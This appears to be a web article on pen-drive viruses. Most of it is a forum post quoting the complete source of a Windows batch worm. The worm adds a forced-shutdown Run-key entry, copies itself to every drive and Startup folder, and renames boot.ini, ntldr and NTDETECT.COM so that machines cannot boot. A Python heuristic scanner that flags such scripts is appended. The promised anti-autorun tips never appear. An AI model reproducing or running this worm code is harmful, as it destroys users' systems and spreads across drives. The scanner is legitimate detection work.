Say Goodbye to PenDrive Viruses: Turn off Autorun and make your PC run smoothly again :)


Nowadays everyone needs a pen drive, flash drive or, let's just say, a removable storage device, and most Trojans and viruses spread through these devices. You'll see that commercial shops are very much afraid of pen drives; most of them refuse service if you want to use one.
Now let us learn some vital techniques to get rid of this messy headache once and for all. This article is a collection of tips and tricks gathered from the net and from our own experience. We will learn how to fight infections from pen drive viruses such as DiskKnight, Kopa and Brontok, and also how to kill them. In most cases we won't even need an antivirus.


Anatomy of a worm written with plain Windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created an MS-DOS .bat file using Notepad and then converted the shezan.bat file to .exe using a bat2exe software. It's nothing. I somehow cobbled it together with patchwork… Check the source code…
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! You've found a great security hole that Windows has. It's a security hole because Windows lets the program change certain settings without taking precautions. Have you tested the renaming part of this?
Now listen: it's nothing near a virus. It's just malware. A virus needs a lot of capabilities to be called a virus: replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can, though, be called a worm.
Antiviruses detect it as those test in heuristic mode…
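
How a heuristic scanner can flag a script like the one quoted above without a signature, as an added example that is not part of the original posts: it statically scores batch text for Run-key persistence, Startup-folder drops, boot-file tampering and copies to several drive roots. The rule names, weights and threshold are assumptions chosen for illustration, and the benign sample is constructed.

```python
import re

SET_RE = re.compile(r"^\s*set\s+(\w+)=(.*)$", re.I)
ROOT_COPY_RE = re.compile(r"^\s*copy\s+\S+\s+([a-z]):\\?\s*$", re.I)
# (rule, weight, pattern); weights and threshold are illustrative assumptions
RULES = [
    ("run_key_persistence", 3, r"\breg\s+add\s+\S*\\currentversion\\run(once)?\b"),
    ("startup_folder_drop", 3, r"\bcopy\b.*\\start menu\\programs\\startup"),
    ("boot_file_tamper", 4, r"\b(ren|rename|del|attrib)\b.*\\(boot\.ini|ntldr|ntdetect\.com)\b"),
]
THRESHOLD, MIN_ROOTS = 5, 3

def expand(lines):
    """Yield each line with %VAR% replaced by values from earlier SET commands."""
    env = {}
    for line in lines:
        # Unknown variables such as %windir% are left untouched.
        line = re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), line)
        if m := SET_RE.match(line):
            env[m.group(1).lower()] = m.group(2).strip()
        yield line

def scan(script_text):
    """Return (score, sorted names of rules that fired); the text is never executed."""
    hits, roots = {}, set()
    for line in expand(script_text.splitlines()):
        for name, weight, pattern in RULES:
            if re.search(pattern, line, re.I):
                hits[name] = weight          # each rule counts once
        if m := ROOT_COPY_RE.match(line):
            roots.add(m.group(1).lower())
    if len(roots) >= MIN_ROOTS:              # one file copied to several drive roots
        hits["drive_root_spray"] = 2
    return sum(hits.values()), sorted(hits)

def is_suspicious(script_text):
    return scan(script_text)[0] >= THRESHOLD

# Lines excerpted from the script quoted above (treated as inert text)
WORM_EXCERPT = r"""SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f
copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
ren c:\boot.ini shezan.ini"""
# Constructed benign backup script for contrast
BENIGN = r"""SET DEST=e:\backup
copy report.doc %DEST%
copy notes.txt e:"""
```

The scanner expands `SET` variables first because the Run key in the quoted script only appears through `%KEY%`; matching the raw `REG ADD %KEY%` line alone would miss it.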